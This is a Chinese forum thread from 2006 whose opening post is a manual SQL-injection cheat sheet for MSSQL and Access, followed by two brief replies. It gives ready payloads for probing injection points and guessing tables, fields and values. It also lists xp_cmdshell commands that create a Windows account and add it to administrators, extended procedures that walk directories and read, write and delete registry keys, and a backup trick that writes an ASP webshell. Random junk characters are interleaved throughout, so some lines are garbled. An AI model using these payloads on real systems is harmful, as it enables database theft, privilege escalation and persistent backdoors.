社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4643阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 s,"<+80%  
  2.初步判断是否是mssql ;and user>0 5 r"`c  
?2%d;tW  
  3.注入参数是字符'and [查询条件] and ''=' h5U@Ys  
fr;>`u[;  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' /lx\9S|  
hkJ4,.  
  5.判断数据库系统  3@J0-w  
V z8o  
  ;and (select count(*) from sysobjects)>0 mssql 5 1@V""m  
|J'@-*5?[8  
  ;and (select count(*) from msysobjects)>0 access 05LVfgJ'q  
Cv>|>Ob#  
)(9>r /bq  
?&_ -,\t  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 CK 3]]{  
EJ.oq*W!*J  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 he wX)  
x %L2eXL  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 k8F<j)"  
I0(BKMp&  
  9.(1)猜字段的ascii值(access) (8qMF{  
5CueD]  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 yN5g]U. Q  
4cRF3$a md  
  (2)猜字段的ascii值(mssql) $}jp=?,t  
7$<.I#x  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 wXMKQ)$(  
KF|+# qCN  
  10.测试权限结构(mssql) n&D<l '4  
Z%y>q|:  
!Sy._NE`z  
_Buwz_[&  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- \acJ9N  
U,LW(wueT  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- j5|_SQOmt  
LUl6^JU  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- :@rE&  
BDNn~aU#m  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- #25Z,UU  
6B)(kPW  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ~.u}v~ F  
T(MS,AyD]  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- Sav]Kxq{  
M")JbuI  
  ;and 1=(select IS_MEMBER('db_owner'));-- @H= d8$  
am{f<v,EI  
oN)l/"%C7/  
=SB#rCH  
  11.添加mssql和系统的帐户 {^i73}@O  
S 3Tp__  
  ;exec master.dbo.sp_addlogin username;-- Qg"hN  
  ;exec master.dbo.sp_password null,username,password;-- hF s:9  
01g=Cg  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- PBbJfm  
1"?KQU  
  ;exec master.dbo.xp_cmdshell 'net user username password jGl8y!aM  
U s86.@|  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- klxVsx%I{G  
f_}/JF  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- nT..+ J)  
9W:oo:dK F  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- _T&?H&#  
J0*hJ-/u  
iZ<^p1i  
"CLoM\M)  
  12.(1)遍历目录 ym9Z:2g  
Ve*NM|jg  
  ;create table dirs(paths varchar(100), id int) E0!}~Z)  
I 8vv  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' MP(R2y  
btHN  
  ;and (select top 1 paths from dirs)>0 seC]=UJh#>  
eqU2>bI f  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) VR ^qwS/  
f.JZ[+  
mE'y$5ZxY  
ye:pGa w  
  (2)遍历目录 -G e5gQ=  
rZ2X$FO@  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- b6:A-jb*I  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 PElC0 qCn[  
<cNXe4(  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 WSi`)@.X O  
J( JsfU4  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 G3'>KMa.  
?YWfoH4mS  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 , (dg]7  
bO 2>ced  
GmP)"@O](;  
:i_818h!?[  
  13.mssql中的存储过程 1 rKKph  
u\wdb^8ds  
  xp_regenumvalues 注册表根键, 子键 T]Z|Wq`bot  
s:3 altv  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 #"-?+F=rk  
5Ds/^fA  
  xp_regread 根键,子键,键值名 0D/u`-  
(|)`~z  
  ;exec xp_regread c[\ :^w^I6  
4 YDK`:4I~  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ~XN--4%Q  
;*1bTdB5a  
  xp_regwrite 根键,子键, 值名, 值类型, 值 uPKq<hBI  
<_$]!Z6UR  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ?j;e/r.  
(MhC83|?  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 &IsQgS7R  
=M'M/vKD  
  xp_regdeletevalue 根键,子键,值名 PLU8:H@X  
nlmc/1C  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 *vt5dxB  
_G%]d$2f`  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 s7.2EkGl=  
kP~'C'5Ys  
 %Xs3Lz  
c.-h'1  
  14.mssql的backup创建webshell `Fa49B|`D  
gwhd) .*  
  use model 1{l18B`  
Ri4t/H  
  create table cmd(str image); 2w\$}'  
Wt5x*p-!C  
  insert into cmd(str) values (''); 0 zm)MSg  
?3X!  
  backup database model to disk='c:\l.asp'; y6NOHPp@  
ie|I*;#  
fHhm)T8KB  
A tl`J.;G  
  15.mssql内置函数 :W]?6=  
VH[r@Pn  
  ;and (select @@version)>0 获得Windows的版本号 BCsz8U!  
MJNY#v3  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa d]1%/$v^  
2{;&c  
  ;and (select user_name())>0 爆当前系统的连接用户 J$6h% Eyo  
AQ n>K{M  
  ;and (select db_name())>0 得到当前连接的数据库 dp`xyBQ3  
I@Zd<Rn  
$$ %4,\{l  
#p& &w1  
  16.简洁的webshell S Y\ UuZ  
} 8ZCWmd  
  use model 5v"r>q[ X  
uD4=1g6[s  
  create table cmd(str image); ! `5[(lm  
pRI<L'  
  insert into cmd(str) values (''); @P=St\;VP  
OS8 ^mC  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
欢迎提供真实交流,考虑发帖者的感受
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八